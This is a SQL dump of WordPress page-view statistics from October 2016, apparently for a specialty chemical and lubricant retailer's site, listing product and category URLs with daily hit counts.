INSERT INTO `wp_statistics_pages` VALUES ('/product/1102/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1102); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/', '2016-10-10', 7, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-10', 9, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-10', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-10', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-10', 11, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-10', 4, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-10', 3, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-10', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-10', 2, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-10', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-10', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-10', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-10', 2, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-10', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ad/', '2016-10-10', 1, 645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-10', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ad/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-10', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-10', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-10', 2, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-10', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-10', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-10', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-10', 2, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-10', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-10', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-10', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-10', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-10', 2, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/', '2016-10-10', 3, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-462h/', '2016-10-10', 2, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-10', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-10', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-10', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-10', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-10', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470s-12-oz-aerosol/', '2016-10-10', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-10', 2, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-10', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-10', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ab/', '2016-10-10', 1, 649); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-10', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-10', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-10', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-467c/', '2016-10-10', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ac/', '2016-10-10', 1, 651); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ab/', '2016-10-10', 1, 654); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-10', 2, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-10', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-114c/', '2016-10-10', 4, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-114c/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-10', 3, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-10', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a7/', '2016-10-10', 1, 1001); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-10', 4, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-10', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-10', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/', '2016-10-10', 5, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-10', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-10', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-10', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-10', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings', '2016-10-10', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-10', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-10', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-10', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-10', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements', '2016-10-10', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-10', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-10', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-10', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-10', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-10', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-10', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-10', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-10', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-10', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-10', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-10', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-10', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-10', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant', '2016-10-10', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide', '2016-10-10', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-10', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-10', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-477c/', '2016-10-10', 2, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/', '2016-10-10', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1221); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/', '2016-10-10', 4, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/?wc-ajax=get_refreshed_fragments', '2016-10-10', 3, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-10', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-10', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-10', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-10', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-10', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-10', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-10', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-10', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-10', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-10', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-10', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2474&preview=true', '2016-10-10', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-10', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?preview_id=2474&preview_nonce=56b8a96a00&post_format=standard&_thumbnail_id=2475&preview=true', '2016-10-10', 4, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-10', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb-copy/', '2016-10-10', 1, 1666); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agent/', '2016-10-10', 1, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-10', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-10', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-10', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/?preview_id=455&preview_nonce=f4baa3069f&_thumbnail_id=-1&preview=true', '2016-10-10', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-10', 1, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-10', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-10', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-10', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/?wc-ajax=get_refreshed_fragments', '2016-10-10', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-11', 440, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-11', 125, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-11', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-11', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-11', 37, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-11', 84, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-11', 6, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-11', 16, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-11', 41, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-11', 3, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-11', 13, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lubrication-overview/', '2016-10-11', 2, 2058); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lubrication-overview/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 2058); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-11', 13, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-11', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroextreme-dental-lubricant/', '2016-10-11', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-11', 20, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-11', 13, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-11', 12, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-11', 10, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-11', 3, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-11', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-11', 10, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/?wc-ajax=get_refreshed_fragments', '2016-10-11', 4, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-11', 14, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-11', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-11', 3, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-11', 3, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-11', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-11', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings', '2016-10-11', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-11', 17, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-11', 6, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-11', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-11', 3, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-11', 11, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-11', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-11', 13, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-11', 3, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-11', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-11', 5, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-11', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-11', 4, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements', '2016-10-11', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-11', 4, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-11', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-11', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-11', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-11', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-11', 3, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-11', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-11', 3, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-11', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-11', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-11', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-11', 3, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-11', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-11', 4, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-11', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-11', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-11', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-11', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-11', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-11', 3, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-11', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant', '2016-10-11', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-11', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide', '2016-10-11', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-11', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-11', 3, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-11', 7, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-11', 2, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-11', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-11', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-11', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-11', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-11', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-11', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-11', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-11', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-11', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-11', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-11', 3, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-10-11', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-11', 2, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-11', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-11', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-11', 8, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/', '2016-10-11', 2, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-465c/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-11', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-11', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-11', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-11', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-11', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-11', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-11', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-11', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-11', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 2381); 
